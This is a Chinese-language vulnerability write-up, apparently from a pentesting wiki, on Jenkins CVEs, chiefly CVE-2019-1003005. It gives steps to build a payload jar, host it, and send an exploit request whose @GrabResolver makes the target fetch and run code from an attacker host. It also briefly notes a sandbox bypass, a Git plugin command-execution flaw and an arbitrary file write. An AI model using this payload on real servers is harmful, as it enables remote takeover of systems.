CVE-2019-1003005 远程代码执行

受影响版本：

Jenkins 2.53
Jenkins 2.122
Jenkins 2.137
Jenkins 2.138 启用匿名读取
Jenkins 2.152 启用匿名读取
Jenkins 2.153 启用匿名读取
Script Security Plugin 1.43
Script Security Plugin 1.48

下载利用脚本：https://github.com/orangetw/awesome-jenkins-rce-2019

构建环境后，执行脚本如下

显示如下

当然如果不想使用这种一键式脚本还可以自己构造jar来利用

https://创建Payload.javaxn--payload-dp0lt07g.java

编译文件，创建META-INF/services/文件夹，同时在文件夹下创建名为org.codehaus.groovy.plugins.Runners的文件。内容随意，比如Payload

文件创建后，在某一目录下，文件树类似如下：

编译以上目录jar cvf poc-1.jar code/

将编译产生的文件移动到类似如下地址cp poc-1.jar ~/www/code/payload/poc/1/

将www目录移动到web服务器中，地址类似：http://xxx.com/code/payload/poc/1.poc-1.jar

利用如下exp

http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a@Grab(group='package', module='payload', version='1')%0aimport Payload;

CVE-2019-1003029 Script Security Plugin沙箱绕过

此漏洞和CVE-2019-1003005漏洞同样都是由Script Security插件引起。利用方式和上一致。影响版本1.55以下。

CVE-2019-10392 Jenkins Git 插件命令执行

之前做过这个漏洞的复现，地址：https://misakikata.github.io/2019/09/CVE-2019-10392-Jenkins-2k19%E8%AE%A4%E8%AF%81%E8%BF%9C%E7%A8%8BRCE/

CVE-2019-10352 任意文件写入

该漏洞使经过身份验证的具有Job/Configure权限的攻击者可以使用目标之外的文件名定义文件参数，从而导致任意文件写入。

创建一个名为test的新“自由式项目”（该项目的工作空间将位于JENKINS_HOME/workspace/test）

Previousjenkins NextCVE-2019-1003000 远程代码执行

Last updated 4 years ago

hashtagCVE-2019-1003029 Script Security Plugin沙箱绕过

hashtagCVE-2019-10392 Jenkins Git 插件命令执行

hashtagCVE-2019-10352 任意文件写入

CVE-2019-1003029 Script Security Plugin沙箱绕过

CVE-2019-10392 Jenkins Git 插件命令执行

CVE-2019-10352 任意文件写入